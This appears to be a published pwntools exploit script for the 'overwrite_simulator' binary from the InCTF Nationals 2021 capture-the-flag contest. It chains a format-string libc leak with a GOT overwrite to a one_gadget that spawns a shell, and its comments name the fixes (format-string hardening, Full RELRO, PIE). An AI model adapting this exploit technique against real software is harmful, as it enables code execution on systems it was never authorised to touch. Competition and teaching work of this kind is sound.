k1R4/exploit.py Secret

Created December 19, 2021 07:00
overwrite_simulator - InCTF Nationals 2021
# Exploit driver for the "overwrite_simulator" CTF challenge (InCTF Nationals 2021).
#
# From the prompts and comments below, the target offers a menu whose
# options appear to be: 1 = write caller-supplied bytes to a caller-chosen
# address, 2 = print a global buffer (used here as a printf format string),
# 3 = read input via getchar.  The script chains these into a libc leak
# followed by a GOT overwrite.  Menu semantics are inferred from the I/O
# sequence here, not from the binary — confirm against the challenge.
#
# Why the chain works (and what would stop it, for defenders):
#   * a user-controlled buffer reaches printf as the format argument
#     (the fix is printf("%s", buf) / -Wformat-security);
#   * the GOT is writable, so a libc pointer can be redirected
#     (Full RELRO, -Wl,-z,relro,-z,now, makes this stage fail);
#   * fixed addresses such as 0x404068 suggest a non-PIE binary — verify
#     with checksec; PIE would additionally require a binary-base leak.
from pwn import *
p = process("./overwrite_simulator")
elf = ELF("./overwrite_simulator")
libc = ELF("./libc.so.6")   # challenge-provided libc; the offsets below are tied to this exact build
context.binary = elf
# Address of a writable global inside the binary (name taken from the author's variable).
hello_there = 0x404068
# Offset (relative to libc base) of an execve("/bin/sh") gadget in this libc build.
one_gadget = 0xe6c84
# execve("/bin/sh", rsi, rdx)
# constraints:
# [rsi] == NULL || rsi == NULL
# [rdx] == NULL || rdx == NULL
# Overwrite global variable to format string
# Stage 1: store "%13$llx" in the global so the later print emits the 13th
# positional argument as a 64-bit hex value; the trailing \x00 presumably
# terminates the string inside the global.
p.sendlineafter(">> ", "1")
p.sendlineafter(": ", str(hello_there))
p.sendlineafter(": ", "%13$llx\x00")
# Use the format string to leak libc address on stack
# Stage 2: read exactly 12 hex characters and rebase libc.  0x270b3 is the
# distance from the leaked value to libc base for this particular build
# (presumably a return address into __libc_start_main — confirm).
# NOTE(review): no validation — if the output is shorter, not hex, or from a
# different libc, int() raises ValueError or the computed base is wrong.
p.sendlineafter(">> ", "2")
libc.address = int(p.recv(12),16) - 0x270b3
log.info("Libc -> "+hex(libc.address))
# Overwrite GOT(getchar) with one_gadget
# Stage 3: reuse the arbitrary write to replace getchar's GOT slot with the
# absolute gadget address (8 bytes, little-endian via p64).
p.sendlineafter(">> ", "1")
p.sendlineafter(": ", str(elf.got["getchar"]))
p.sendlineafter(": ", p64(libc.address+one_gadget))
# Trigger one_gadget at getchar after scanf in main
# Stage 4: option 3 calls getchar, which now dispatches to the gadget; the
# register constraints listed above must hold at that call site.
p.sendlineafter(">> ", "3")
p.interactive()